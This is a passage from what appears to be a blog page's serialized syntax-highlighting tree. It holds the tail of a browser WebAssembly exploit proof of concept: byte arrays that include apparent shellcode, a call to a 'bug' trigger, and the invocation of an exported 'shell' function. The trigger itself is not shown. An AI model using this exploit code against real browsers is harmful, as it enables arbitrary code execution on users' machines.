1, 2, 0, 11,\n ]);\n const buffer = new Uint8Array([\n 147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64,\n 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0,\n 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 204, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93,\n 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0,\n ]);\n let r = bug(wasm_code, buffer.buffer);\n result = (await r.next()).value;\n const wasm_instance = new WebAssembly.Instance(result);\n const f = wasm_instance.exports.shell;\n f();\n})();\n",[2297],{"type":27,"tag":84,"props":2298,"children":2299},{"__ignoreMap":7},[2300,2326,2354,2574,2641,2649,2677,2894,3147,3398,3626,3873,4093,4101,4152,4201,4247,4288,4302],{"type":27,"tag":207,"props":2301,"children":2302},{"class":209,"line":210},[2303,2307,2312,2317,2322],{"type":27,"tag":207,"props":2304,"children":2305},{"style":238},[2306],{"type":33,"value":1343},{"type":27,"tag":207,"props":2308,"children":2309},{"style":214},[2310],{"type":33,"value":2311},"async",{"type":27,"tag":207,"props":2313,"children":2314},{"style":238},[2315],{"type":33,"value":2316}," () ",{"type":27,"tag":207,"props":2318,"children":2319},{"style":214},[2320],{"type":33,"value":2321},"=>",{"type":27,"tag":207,"props":2323,"children":2324},{"style":238},[2325],{"type":33,"value":384},{"type":27,"tag":207,"props":2327,"children":2328},{"class":209,"line":244},[2329,2334,2338,2342,2346,2350],{"type":27,"tag":207,"props":2330,"children":2331},{"style":214},[2332],{"type":33,"value":2333}," const",{"type":27,"tag":207,"props":2335,"children":2336},{"style":220},[2337],{"type":33,"value":1588},{"type":27,"tag":207,"props":2339,"children":2340},{"style":226},[2341],{"type":33,"value":229},{"type":27,"tag":207,"props":2343,"children":2344},{"style":214},[2345],{"type":33,"value":1597},{"type":27,"tag":207,"props":2347,"children":2348},{"style":1335},[2349],{"type":33,"value":1602},{"type":27,"tag":207,"props":2351,"children":2352},{"style":238},[2353],{"type":33,"value":1607},{"type":27,"tag":207,"props":2355,"children":2356},{"class":209,"line":270},[2357,2362,2366,2370,2374,2378,2382,2386,2390,2394,2398,2402,2406,2410,2414,2418,2422,2426,2430,2434,2438,2442,2446,2450,2454,2458,2462,2466,2470,2474,2478,2482,2486,2490,2494,2498,2502,2506,2510,2514,2518,2522,2526,2530,2534,2538,2542,2546,2550,2554,2558,2562,2566,2570],{"type":27,"tag":207,"props":2358,"children":2359},{"style":232},[2360],{"type":33,"value":2361}," 0",{"type":27,"tag":207,"props":2363,"children":2364},{"style":238},[2365],{"type":33,"value":1123},{"type":27,"tag":207,"props":2367,"children":2368},{"style":232},[2369],{"type":33,"value":1624},{"type":27,"tag":207,"props":2371,"children":2372},{"style":238},[2373],{"type":33,"value":1123},{"type":27,"tag":207,"props":2375,"children":2376},{"style":232},[2377],{"type":33,"value":1633},{"type":27,"tag":207,"props":2379,"children":2380},{"style":238},[2381],{"type":33,"value":1123},{"type":27,"tag":207,"props":2383,"children":2384},{"style":232},[2385],{"type":33,"value":1642},{"type":27,"tag":207,"props":2387,"children":2388},{"style":238},[2389],{"type":33,"value":1123},{"type":27,"tag":207,"props":2391,"children":2392},{"style":232},[2393],{"type":33,"value":1651},{"type":27,"tag":207,"props":2395,"children":2396},{"style":238},[2397],{"type":33,"value":1123},{"type":27,"tag":207,"props":2399,"children":2400},{"style":232},[2401],{"type":33,"value":1660},{"type":27,"tag":207,"props":2403,"children":2404},{"style":238},[2405],{"type":33,"value":1123},{"type":27,"tag":207,"props":2407,"children":2408},{"style":232},[2409],{"type":33,"value":1660},{"type":27,"tag":207,"props":2411,"children":2412},{"style":238},[2413],{"type":33,"value":1123},{"type":27,"tag":207,"props":2415,"children":2416},{"style":232},[2417],{"type":33,"value":1660},{"type":27,"tag":207,"props":2419,"children":2420},{"style":238},[2421],{"type":33,"value":1123},{"type":27,"tag":207,"props":2423,"children":2424},{"style":232},[2425],{"type":33,"value":1651},{"type":27,"tag":207,"props":2427,"children":2428},{"style":238},[2429],{"type":33,"value":1123},{"type":27,"tag":207,"props":2431,"children":2432},{"style":232},[2433],{"type":33,"value":1693},{"type":27,"tag":207,"props":2435,"children":2436},{"style":238},[2437],{"type":33,"value":1123},{"type":27,"tag":207,"props":2439,"children":2440},{"style":232},[2441],{"type":33,"value":1651},{"type":27,"tag":207,"props":2443,"children":2444},{"style":238},[2445],{"type":33,"value":1123},{"type":27,"tag":207,"props":2447,"children":2448},{"style":232},[2449],{"type":33,"value":1710},{"type":27,"tag":207,"props":2451,"children":2452},{"style":238},[2453],{"type":33,"value":1123},{"type":27,"tag":207,"props":2455,"children":2456},{"style":232},[2457],{"type":33,"value":1660},{"type":27,"tag":207,"props":2459,"children":2460},{"style":238},[2461],{"type":33,"value":1123},{"type":27,"tag":207,"props":2463,"children":2464},{"style":232},[2465],{"type":33,"value":1660},{"type":27,"tag":207,"props":2467,"children":2468},{"style":238},[2469],{"type":33,"value":1123},{"type":27,"tag":207,"props":2471,"children":2472},{"style":232},[2473],{"type":33,"value":1735},{"type":27,"tag":207,"props":2475,"children":2476},{"style":238},[2477],{"type":33,"value":1123},{"type":27,"tag":207,"props":2479,"children":2480},{"style":232},[2481],{"type":33,"value":1744},{"type":27,"tag":207,"props":2483,"children":2484},{"style":238},[2485],{"type":33,"value":1123},{"type":27,"tag":207,"props":2487,"children":2488},{"style":232},[2489],{"type":33,"value":1651},{"type":27,"tag":207,"props":2491,"children":2492},{"style":238},[2493],{"type":33,"value":1123},{"type":27,"tag":207,"props":2495,"children":2496},{"style":232},[2497],{"type":33,"value":1660},{"type":27,"tag":207,"props":2499,"children":2500},{"style":238},[2501],{"type":33,"value":1123},{"type":27,"tag":207,"props":2503,"children":2504},{"style":232},[2505],{"type":33,"value":1769},{"type":27,"tag":207,"props":2507,"children":2508},{"style":238},[2509],{"type":33,"value":1123},{"type":27,"tag":207,"props":2511,"children":2512},{"style":232},[2513],{"type":33,"value":1778},{"type":27,"tag":207,"props":2515,"children":2516},{"style":238},[2517],{"type":33,"value":1123},{"type":27,"tag":207,"props":2519,"children":2520},{"style":232},[2521],{"type":33,"value":1651},{"type":27,"tag":207,"props":2523,"children":2524},{"style":238},[2525],{"type":33,"value":1123},{"type":27,"tag":207,"props":2527,"children":2528},{"style":232},[2529],{"type":33,"value":1152},{"type":27,"tag":207,"props":2531,"children":2532},{"style":238},[2533],{"type":33,"value":1123},{"type":27,"tag":207,"props":2535,"children":2536},{"style":232},[2537],{"type":33,"value":1633},{"type":27,"tag":207,"props":2539,"children":2540},{"style":238},[2541],{"type":33,"value":1123},{"type":27,"tag":207,"props":2543,"children":2544},{"style":232},[2545],{"type":33,"value":1811},{"type":27,"tag":207,"props":2547,"children":2548},{"style":238},[2549],{"type":33,"value":1123},{"type":27,"tag":207,"props":2551,"children":2552},{"style":232},[2553],{"type":33,"value":1820},{"type":27,"tag":207,"props":2555,"children":2556},{"style":238},[2557],{"type":33,"value":1123},{"type":27,"tag":207,"props":2559,"children":2560},{"style":232},[2561],{"type":33,"value":1829},{"type":27,"tag":207,"props":2563,"children":2564},{"style":238},[2565],{"type":33,"value":1123},{"type":27,"tag":207,"props":2567,"children":2568},{"style":232},[2569],{"type":33,"value":1829},{"type":27,"tag":207,"props":2571,"children":2572},{"style":238},[2573],{"type":33,"value":1842},{"type":27,"tag":207,"props":2575,"children":2576},{"class":209,"line":296},[2577,2581,2585,2589,2593,2597,2601,2605,2609,2613,2617,2621,2625,2629,2633,2637],{"type":27,"tag":207,"props":2578,"children":2579},{"style":232},[2580],{"type":33,"value":2361},{"type":27,"tag":207,"props":2582,"children":2583},{"style":238},[2584],{"type":33,"value":1123},{"type":27,"tag":207,"props":2586,"children":2587},{"style":232},[2588],{"type":33,"value":1660},{"type":27,"tag":207,"props":2590,"children":2591},{"style":238},[2592],{"type":33,"value":1123},{"type":27,"tag":207,"props":2594,"children":2595},{"style":232},[2596],{"type":33,"value":1866},{"type":27,"tag":207,"props":2598,"children":2599},{"style":238},[2600],{"type":33,"value":1123},{"type":27,"tag":207,"props":2602,"children":2603},{"style":232},[2604],{"type":33,"value":1693},{"type":27,"tag":207,"props":2606,"children":2607},{"style":238},[2608],{"type":33,"value":1123},{"type":27,"tag":207,"props":2610,"children":2611},{"style":232},[2612],{"type":33,"value":1651},{"type":27,"tag":207,"props":2614,"children":2615},{"style":238},[2616],{"type":33,"value":1123},{"type":27,"tag":207,"props":2618,"children":2619},{"style":232},[2620],{"type":33,"value":1744},{"type":27,"tag":207,"props":2622,"children":2623},{"style":238},[2624],{"type":33,"value":1123},{"type":27,"tag":207,"props":2626,"children":2627},{"style":232},[2628],{"type":33,"value":1660},{"type":27,"tag":207,"props":2630,"children":2631},{"style":238},[2632],{"type":33,"value":1123},{"type":27,"tag":207,"props":2634,"children":2635},{"style":232},[2636],{"type":33,"value":1907},{"type":27,"tag":207,"props":2638,"children":2639},{"style":238},[2640],{"type":33,"value":1842},{"type":27,"tag":207,"props":2642,"children":2643},{"class":209,"line":445},[2644],{"type":27,"tag":207,"props":2645,"children":2646},{"style":238},[2647],{"type":33,"value":2648}," ]);\n",{"type":27,"tag":207,"props":2650,"children":2651},{"class":209,"line":867},[2652,2656,2661,2665,2669,2673],{"type":27,"tag":207,"props":2653,"children":2654},{"style":214},[2655],{"type":33,"value":2333},{"type":27,"tag":207,"props":2657,"children":2658},{"style":220},[2659],{"type":33,"value":2660}," buffer",{"type":27,"tag":207,"props":2662,"children":2663},{"style":226},[2664],{"type":33,"value":229},{"type":27,"tag":207,"props":2666,"children":2667},{"style":214},[2668],{"type":33,"value":1597},{"type":27,"tag":207,"props":2670,"children":2671},{"style":1335},[2672],{"type":33,"value":1602},{"type":27,"tag":207,"props":2674,"children":2675},{"style":238},[2676],{"type":33,"value":1607},{"type":27,"tag":207,"props":2678,"children":2679},{"class":209,"line":892},[2680,2685,2689,2694,2698,2703,2707,2712,2716,2721,2725,2730,2734,2739,2743,2748,2752,2757,2761,2766,2770,2774,2778,2782,2786,2791,2795,2800,2804,2809,2813,2817,2821,2825,2829,2833,2837,2841,2845,2849,2853,2857,2861,2865,2869,2873,2877,2881,2885,2890],{"type":27,"tag":207,"props":2681,"children":2682},{"style":232},[2683],{"type":33,"value":2684}," 147",{"type":27,"tag":207,"props":2686,"children":2687},{"style":238},[2688],{"type":33,"value":1123},{"type":27,"tag":207,"props":2690,"children":2691},{"style":232},[2692],{"type":33,"value":2693},"6",{"type":27,"tag":207,"props":2695,"children":2696},{"style":238},[2697],{"type":33,"value":1123},{"type":27,"tag":207,"props":2699,"children":2700},{"style":232},[2701],{"type":33,"value":2702},"222",{"type":27,"tag":207,"props":2704,"children":2705},{"style":238},[2706],{"type":33,"value":1123},{"type":27,"tag":207,"props":2708,"children":2709},{"style":232},[2710],{"type":33,"value":2711},"192",{"type":27,"tag":207,"props":2713,"children":2714},{"style":238},[2715],{"type":33,"value":1123},{"type":27,"tag":207,"props":2717,"children":2718},{"style":232},[2719],{"type":33,"value":2720},"20",{"type":27,"tag":207,"props":2722,"children":2723},{"style":238},[2724],{"type":33,"value":1123},{"type":27,"tag":207,"props":2726,"children":2727},{"style":232},[2728],{"type":33,"value":2729},"119",{"type":27,"tag":207,"props":2731,"children":2732},{"style":238},[2733],{"type":33,"value":1123},{"type":27,"tag":207,"props":2735,"children":2736},{"style":232},[2737],{"type":33,"value":2738},"44",{"type":27,"tag":207,"props":2740,"children":2741},{"style":238},[2742],{"type":33,"value":1123},{"type":27,"tag":207,"props":2744,"children":2745},{"style":232},[2746],{"type":33,"value":2747},"43",{"type":27,"tag":207,"props":2749,"children":2750},{"style":238},[2751],{"type":33,"value":1123},{"type":27,"tag":207,"props":2753,"children":2754},{"style":232},[2755],{"type":33,"value":2756},"127",{"type":27,"tag":207,"props":2758,"children":2759},{"style":238},[2760],{"type":33,"value":1123},{"type":27,"tag":207,"props":2762,"children":2763},{"style":232},[2764],{"type":33,"value":2765},"62",{"type":27,"tag":207,"props":2767,"children":2768},{"style":238},[2769],{"type":33,"value":1123},{"type":27,"tag":207,"props":2771,"children":2772},{"style":232},[2773],{"type":33,"value":1735},{"type":27,"tag":207,"props":2775,"children":2776},{"style":238},[2777],{"type":33,"value":1123},{"type":27,"tag":207,"props":2779,"children":2780},{"style":232},[2781],{"type":33,"value":1660},{"type":27,"tag":207,"props":2783,"children":2784},{"style":238},[2785],{"type":33,"value":1123},{"type":27,"tag":207,"props":2787,"children":2788},{"style":232},[2789],{"type":33,"value":2790},"159",{"type":27,"tag":207,"props":2792,"children":2793},{"style":238},[2794],{"type":33,"value":1123},{"type":27,"tag":207,"props":2796,"children":2797},{"style":232},[2798],{"type":33,"value":2799},"206",{"type":27,"tag":207,"props":2801,"children":2802},{"style":238},[2803],{"type":33,"value":1123},{"type":27,"tag":207,"props":2805,"children":2806},{"style":232},[2807],{"type":33,"value":2808},"136",{"type":27,"tag":207,"props":2810,"children":2811},{"style":238},[2812],{"type":33,"value":1123},{"type":27,"tag":207,"props":2814,"children":2815},{"style":232},[2816],{"type":33,"value":2747},{"type":27,"tag":207,"props":2818,"children":2819},{"style":238},[2820],{"type":33,"value":1123},{"type":27,"tag":207,"props":2822,"children":2823},{"style":232},[2824],{"type":33,"value":1660},{"type":27,"tag":207,"props":2826,"children":2827},{"style":238},[2828],{"type":33,"value":1123},{"type":27,"tag":207,"props":2830,"children":2831},{"style":232},[2832],{"type":33,"value":1660},{"type":27,"tag":207,"props":2834,"children":2835},{"style":238},[2836],{"type":33,"value":1123},{"type":27,"tag":207,"props":2838,"children":2839},{"style":232},[2840],{"type":33,"value":1735},{"type":27,"tag":207,"props":2842,"children":2843},{"style":238},[2844],{"type":33,"value":1123},{"type":27,"tag":207,"props":2846,"children":2847},{"style":232},[2848],{"type":33,"value":1660},{"type":27,"tag":207,"props":2850,"children":2851},{"style":238},[2852],{"type":33,"value":1123},{"type":27,"tag":207,"props":2854,"children":2855},{"style":232},[2856],{"type":33,"value":1660},{"type":27,"tag":207,"props":2858,"children":2859},{"style":238},[2860],{"type":33,"value":1123},{"type":27,"tag":207,"props":2862,"children":2863},{"style":232},[2864],{"type":33,"value":1660},{"type":27,"tag":207,"props":2866,"children":2867},{"style":238},[2868],{"type":33,"value":1123},{"type":27,"tag":207,"props":2870,"children":2871},{"style":232},[2872],{"type":33,"value":1660},{"type":27,"tag":207,"props":2874,"children":2875},{"style":238},[2876],{"type":33,"value":1123},{"type":27,"tag":207,"props":2878,"children":2879},{"style":232},[2880],{"type":33,"value":1660},{"type":27,"tag":207,"props":2882,"children":2883},{"style":238},[2884],{"type":33,"value":1123},{"type":27,"tag":207,"props":2886,"children":2887},{"style":232},[2888],{"type":33,"value":2889},"64",{"type":27,"tag":207,"props":2891,"children":2892},{"style":238},[2893],{"type":33,"value":1842},{"type":27,"tag":207,"props":2895,"children":2896},{"class":209,"line":1475},[2897,2901,2905,2909,2913,2917,2921,2925,2929,2933,2937,2941,2945,2949,2953,2957,2961,2965,2969,2973,2977,2981,2985,2989,2993,2997,3001,3005,3009,3013,3017,3021,3025,3029,3033,3038,3042,3046,3050,3054,3058,3062,3066,3071,3075,3079,3083,3087,3091,3095,3099,3103,3107,3111,3115,3119,3123,3127,3131,3135,3139,3143],{"type":27,"tag":207,"props":2898,"children":2899},{"style":232},[2900],{"type":33,"value":2361},{"type":27,"tag":207,"props":2902,"children":2903},{"style":238},[2904],{"type":33,"value":1123},{"type":27,"tag":207,"props":2906,"children":2907},{"style":232},[2908],{"type":33,"value":1660},{"type":27,"tag":207,"props":2910,"children":2911},{"style":238},[2912],{"type":33,"value":1123},{"type":27,"tag":207,"props":2914,"children":2915},{"style":232},[2916],{"type":33,"value":1660},{"type":27,"tag":207,"props":2918,"children":2919},{"style":238},[2920],{"type":33,"value":1123},{"type":27,"tag":207,"props":2922,"children":2923},{"style":232},[2924],{"type":33,"value":1660},{"type":27,"tag":207,"props":2926,"children":2927},{"style":238},[2928],{"type":33,"value":1123},{"type":27,"tag":207,"props":2930,"children":2931},{"style":232},[2932],{"type":33,"value":1660},{"type":27,"tag":207,"props":2934,"children":2935},{"style":238},[2936],{"type":33,"value":1123},{"type":27,"tag":207,"props":2938,"children":2939},{"style":232},[2940],{"type":33,"value":1660},{"type":27,"tag":207,"props":2942,"children":2943},{"style":238},[2944],{"type":33,"value":1123},{"type":27,"tag":207,"props":2946,"children":2947},{"style":232},[2948],{"type":33,"value":1660},{"type":27,"tag":207,"props":2950,"children":2951},{"style":238},[2952],{"type":33,"value":1123},{"type":27,"tag":207,"props":2954,"children":2955},{"style":232},[2956],{"type":33,"value":1651},{"type":27,"tag":207,"props":2958,"children":2959},{"style":238},[2960],{"type":33,"value":1123},{"type":27,"tag":207,"props":2962,"children":2963},{"style":232},[2964],{"type":33,"value":1660},{"type":27,"tag":207,"props":2966,"children":2967},{"style":238},[2968],{"type":33,"value":1123},{"type":27,"tag":207,"props":2970,"children":2971},{"style":232},[2972],{"type":33,"value":1660},{"type":27,"tag":207,"props":2974,"children":2975},{"style":238},[2976],{"type":33,"value":1123},{"type":27,"tag":207,"props":2978,"children":2979},{"style":232},[2980],{"type":33,"value":1660},{"type":27,"tag":207,"props":2982,"children":2983},{"style":238},[2984],{"type":33,"value":1123},{"type":27,"tag":207,"props":2986,"children":2987},{"style":232},[2988],{"type":33,"value":1660},{"type":27,"tag":207,"props":2990,"children":2991},{"style":238},[2992],{"type":33,"value":1123},{"type":27,"tag":207,"props":2994,"children":2995},{"style":232},[2996],{"type":33,"value":1660},{"type":27,"tag":207,"props":2998,"children":2999},{"style":238},[3000],{"type":33,"value":1123},{"type":27,"tag":207,"props":3002,"children":3003},{"style":232},[3004],{"type":33,"value":1660},{"type":27,"tag":207,"props":3006,"children":3007},{"style":238},[3008],{"type":33,"value":1123},{"type":27,"tag":207,"props":3010,"children":3011},{"style":232},[3012],{"type":33,"value":1660},{"type":27,"tag":207,"props":3014,"children":3015},{"style":238},[3016],{"type":33,"value":1123},{"type":27,"tag":207,"props":3018,"children":3019},{"style":232},[3020],{"type":33,"value":1660},{"type":27,"tag":207,"props":3022,"children":3023},{"style":238},[3024],{"type":33,"value":1123},{"type":27,"tag":207,"props":3026,"children":3027},{"style":232},[3028],{"type":33,"value":1693},{"type":27,"tag":207,"props":3030,"children":3031},{"style":238},[3032],{"type":33,"value":1123},{"type":27,"tag":207,"props":3034,"children":3035},{"style":232},[3036],{"type":33,"value":3037},"28",{"type":27,"tag":207,"props":3039,"children":3040},{"style":238},[3041],{"type":33,"value":1123},{"type":27,"tag":207,"props":3043,"children":3044},{"style":232},[3045],{"type":33,"value":1660},{"type":27,"tag":207,"props":3047,"children":3048},{"style":238},[3049],{"type":33,"value":1123},{"type":27,"tag":207,"props":3051,"children":3052},{"style":232},[3053],{"type":33,"value":1660},{"type":27,"tag":207,"props":3055,"children":3056},{"style":238},[3057],{"type":33,"value":1123},{"type":27,"tag":207,"props":3059,"children":3060},{"style":232},[3061],{"type":33,"value":1660},{"type":27,"tag":207,"props":3063,"children":3064},{"style":238},[3065],{"type":33,"value":1123},{"type":27,"tag":207,"props":3067,"children":3068},{"style":232},[3069],{"type":33,"value":3070},"16",{"type":27,"tag":207,"props":3072,"children":3073},{"style":238},[3074],{"type":33,"value":1123},{"type":27,"tag":207,"props":3076,"children":3077},{"style":232},[3078],{"type":33,"value":1660},{"type":27,"tag":207,"props":3080,"children":3081},{"style":238},[3082],{"type":33,"value":1123},{"type":27,"tag":207,"props":3084,"children":3085},{"style":232},[3086],{"type":33,"value":1660},{"type":27,"tag":207,"props":3088,"children":3089},{"style":238},[3090],{"type":33,"value":1123},{"type":27,"tag":207,"props":3092,"children":3093},{"style":232},[3094],{"type":33,"value":1660},{"type":27,"tag":207,"props":3096,"children":3097},{"style":238},[3098],{"type":33,"value":1123},{"type":27,"tag":207,"props":3100,"children":3101},{"style":232},[3102],{"type":33,"value":3037},{"type":27,"tag":207,"props":3104,"children":3105},{"style":238},[3106],{"type":33,"value":1123},{"type":27,"tag":207,"props":3108,"children":3109},{"style":232},[3110],{"type":33,"value":1660},{"type":27,"tag":207,"props":3112,"children":3113},{"style":238},[3114],{"type":33,"value":1123},{"type":27,"tag":207,"props":3116,"children":3117},{"style":232},[3118],{"type":33,"value":1660},{"type":27,"tag":207,"props":3120,"children":3121},{"style":238},[3122],{"type":33,"value":1123},{"type":27,"tag":207,"props":3124,"children":3125},{"style":232},[3126],{"type":33,"value":1660},{"type":27,"tag":207,"props":3128,"children":3129},{"style":238},[3130],{"type":33,"value":1123},{"type":27,"tag":207,"props":3132,"children":3133},{"style":232},[3134],{"type":33,"value":3037},{"type":27,"tag":207,"props":3136,"children":3137},{"style":238},[3138],{"type":33,"value":1123},{"type":27,"tag":207,"props":3140,"children":3141},{"style":232},[3142],{"type":33,"value":1660},{"type":27,"tag":207,"props":3144,"children":3145},{"style":238},[3146],{"type":33,"value":1842},{"type":27,"tag":207,"props":3148,"children":3149},{"class":209,"line":2065},[3150,3154,3158,3162,3166,3170,3174,3178,3182,3186,3190,3194,3198,3202,3206,3210,3214,3218,3222,3226,3230,3234,3238,3242,3246,3250,3254,3258,3262,3266,3270,3274,3278,3282,3286,3290,3294,3298,3302,3306,3310,3314,3318,3322,3326,3330,3334,3338,3342,3346,3350,3354,3358,3362,3366,3370,3374,3378,3382,3386,3390,3394],{"type":27,"tag":207,"props":3151,"children":3152},{"style":232},[3153],{"type":33,"value":2361},{"type":27,"tag":207,"props":3155,"children":3156},{"style":238},[3157],{"type":33,"value":1123},{"type":27,"tag":207,"props":3159,"children":3160},{"style":232},[3161],{"type":33,"value":1660},{"type":27,"tag":207,"props":3163,"children":3164},{"style":238},[3165],{"type":33,"value":1123},{"type":27,"tag":207,"props":3167,"children":3168},{"style":232},[3169],{"type":33,"value":3037},{"type":27,"tag":207,"props":3171,"children":3172},{"style":238},[3173],{"type":33,"value":1123},{"type":27,"tag":207,"props":3175,"children":3176},{"style":232},[3177],{"type":33,"value":1660},{"type":27,"tag":207,"props":3179,"children":3180},{"style":238},[3181],{"type":33,"value":1123},{"type":27,"tag":207,"props":3183,"children":3184},{"style":232},[3185],{"type":33,"value":1660},{"type":27,"tag":207,"props":3187,"children":3188},{"style":238},[3189],{"type":33,"value":1123},{"type":27,"tag":207,"props":3191,"children":3192},{"style":232},[3193],{"type":33,"value":1660},{"type":27,"tag":207,"props":3195,"children":3196},{"style":238},[3197],{"type":33,"value":1123},{"type":27,"tag":207,"props":3199,"children":3200},{"style":232},[3201],{"type":33,"value":1693},{"type":27,"tag":207,"props":3203,"children":3204},{"style":238},[3205],{"type":33,"value":1123},{"type":27,"tag":207,"props":3207,"children":3208},{"style":232},[3209],{"type":33,"value":1660},{"type":27,"tag":207,"props":3211,"children":3212},{"style":238},[3213],{"type":33,"value":1123},{"type":27,"tag":207,"props":3215,"children":3216},{"style":232},[3217],{"type":33,"value":1660},{"type":27,"tag":207,"props":3219,"children":3220},{"style":238},[3221],{"type":33,"value":1123},{"type":27,"tag":207,"props":3223,"children":3224},{"style":232},[3225],{"type":33,"value":1660},{"type":27,"tag":207,"props":3227,"children":3228},{"style":238},[3229],{"type":33,"value":1123},{"type":27,"tag":207,"props":3231,"children":3232},{"style":232},[3233],{"type":33,"value":1660},{"type":27,"tag":207,"props":3235,"children":3236},{"style":238},[3237],{"type":33,"value":1123},{"type":27,"tag":207,"props":3239,"children":3240},{"style":232},[3241],{"type":33,"value":1660},{"type":27,"tag":207,"props":3243,"children":3244},{"style":238},[3245],{"type":33,"value":1123},{"type":27,"tag":207,"props":3247,"children":3248},{"style":232},[3249],{"type":33,"value":1660},{"type":27,"tag":207,"props":3251,"children":3252},{"style":238},[3253],{"type":33,"value":1123},{"type":27,"tag":207,"props":3255,"children":3256},{"style":232},[3257],{"type":33,"value":1660},{"type":27,"tag":207,"props":3259,"children":3260},{"style":238},[3261],{"type":33,"value":1123},{"type":27,"tag":207,"props":3263,"children":3264},{"style":232},[3265],{"type":33,"value":1660},{"type":27,"tag":207,"props":3267,"children":3268},{"style":238},[3269],{"type":33,"value":1123},{"type":27,"tag":207,"props":3271,"children":3272},{"style":232},[3273],{"type":33,"value":1660},{"type":27,"tag":207,"props":3275,"children":3276},{"style":238},[3277],{"type":33,"value":1123},{"type":27,"tag":207,"props":3279,"children":3280},{"style":232},[3281],{"type":33,"value":1660},{"type":27,"tag":207,"props":3283,"children":3284},{"style":238},[3285],{"type":33,"value":1123},{"type":27,"tag":207,"props":3287,"children":3288},{"style":232},[3289],{"type":33,"value":1660},{"type":27,"tag":207,"props":3291,"children":3292},{"style":238},[3293],{"type":33,"value":1123},{"type":27,"tag":207,"props":3295,"children":3296},{"style":232},[3297],{"type":33,"value":2889},{"type":27,"tag":207,"props":3299,"children":3300},{"style":238},[3301],{"type":33,"value":1123},{"type":27,"tag":207,"props":3303,"children":3304},{"style":232},[3305],{"type":33,"value":1660},{"type":27,"tag":207,"props":3307,"children":3308},{"style":238},[3309],{"type":33,"value":1123},{"type":27,"tag":207,"props":3311,"children":3312},{"style":232},[3313],{"type":33,"value":1660},{"type":27,"tag":207,"props":3315,"children":3316},{"style":238},[3317],{"type":33,"value":1123},{"type":27,"tag":207,"props":3319,"children":3320},{"style":232},[3321],{"type":33,"value":1660},{"type":27,"tag":207,"props":3323,"children":3324},{"style":238},[3325],{"type":33,"value":1123},{"type":27,"tag":207,"props":3327,"children":3328},{"style":232},[3329],{"type":33,"value":1660},{"type":27,"tag":207,"props":3331,"children":3332},{"style":238},[3333],{"type":33,"value":1123},{"type":27,"tag":207,"props":3335,"children":3336},{"style":232},[3337],{"type":33,"value":1660},{"type":27,"tag":207,"props":3339,"children":3340},{"style":238},[3341],{"type":33,"value":1123},{"type":27,"tag":207,"props":3343,"children":3344},{"style":232},[3345],{"type":33,"value":1660},{"type":27,"tag":207,"props":3347,"children":3348},{"style":238},[3349],{"type":33,"value":1123},{"type":27,"tag":207,"props":3351,"children":3352},{"style":232},[3353],{"type":33,"value":1660},{"type":27,"tag":207,"props":3355,"children":3356},{"style":238},[3357],{"type":33,"value":1123},{"type":27,"tag":207,"props":3359,"children":3360},{"style":232},[3361],{"type":33,"value":1660},{"type":27,"tag":207,"props":3363,"children":3364},{"style":238},[3365],{"type":33,"value":1123},{"type":27,"tag":207,"props":3367,"children":3368},{"style":232},[3369],{"type":33,"value":1660},{"type":27,"tag":207,"props":3371,"children":3372},{"style":238},[3373],{"type":33,"value":1123},{"type":27,"tag":207,"props":3375,"children":3376},{"style":232},[3377],{"type":33,"value":1660},{"type":27,"tag":207,"props":3379,"children":3380},{"style":238},[3381],{"type":33,"value":1123},{"type":27,"tag":207,"props":3383,"children":3384},{"style":232},[3385],{"type":33,"value":1660},{"type":27,"tag":207,"props":3387,"children":3388},{"style":238},[3389],{"type":33,"value":1123},{"type":27,"tag":207,"props":3391,"children":3392},{"style":232},[3393],{"type":33,"value":1660},{"type":27,"tag":207,"props":3395,"children":3396},{"style":238},[3397],{"type":33,"value":1842},{"type":27,"tag":207,"props":3399,"children":3400},{"class":209,"line":2092},[3401,3405,3409,3413,3417,3421,3425,3429,3433,3437,3441,3445,3449,3453,3457,3461,3465,3469,3473,3477,3481,3485,3489,3493,3497,3501,3505,3509,3513,3517,3521,3525,3529,3534,3538,3543,3547,3552,3556,3561,3565,3570,3574,3579,3583,3588,3592,3596,3600,3605,3609,3613,3617,3622],{"type":27,"tag":207,"props":3402,"children":3403},{"style":232},[3404],{"type":33,"value":2361},{"type":27,"tag":207,"props":3406,"children":3407},{"style":238},[3408],{"type":33,"value":1123},{"type":27,"tag":207,"props":3410,"children":3411},{"style":232},[3412],{"type":33,"value":1660},{"type":27,"tag":207,"props":3414,"children":3415},{"style":238},[3416],{"type":33,"value":1123},{"type":27,"tag":207,"props":3418,"children":3419},{"style":232},[3420],{"type":33,"value":1660},{"type":27,"tag":207,"props":3422,"children":3423},{"style":238},[3424],{"type":33,"value":1123},{"type":27,"tag":207,"props":3426,"children":3427},{"style":232},[3428],{"type":33,"value":1660},{"type":27,"tag":207,"props":3430,"children":3431},{"style":238},[3432],{"type":33,"value":1123},{"type":27,"tag":207,"props":3434,"children":3435},{"style":232},[3436],{"type":33,"value":1660},{"type":27,"tag":207,"props":3438,"children":3439},{"style":238},[3440],{"type":33,"value":1123},{"type":27,"tag":207,"props":3442,"children":3443},{"style":232},[3444],{"type":33,"value":1660},{"type":27,"tag":207,"props":3446,"children":3447},{"style":238},[3448],{"type":33,"value":1123},{"type":27,"tag":207,"props":3450,"children":3451},{"style":232},[3452],{"type":33,"value":1660},{"type":27,"tag":207,"props":3454,"children":3455},{"style":238},[3456],{"type":33,"value":1123},{"type":27,"tag":207,"props":3458,"children":3459},{"style":232},[3460],{"type":33,"value":1660},{"type":27,"tag":207,"props":3462,"children":3463},{"style":238},[3464],{"type":33,"value":1123},{"type":27,"tag":207,"props":3466,"children":3467},{"style":232},[3468],{"type":33,"value":1660},{"type":27,"tag":207,"props":3470,"children":3471},{"style":238}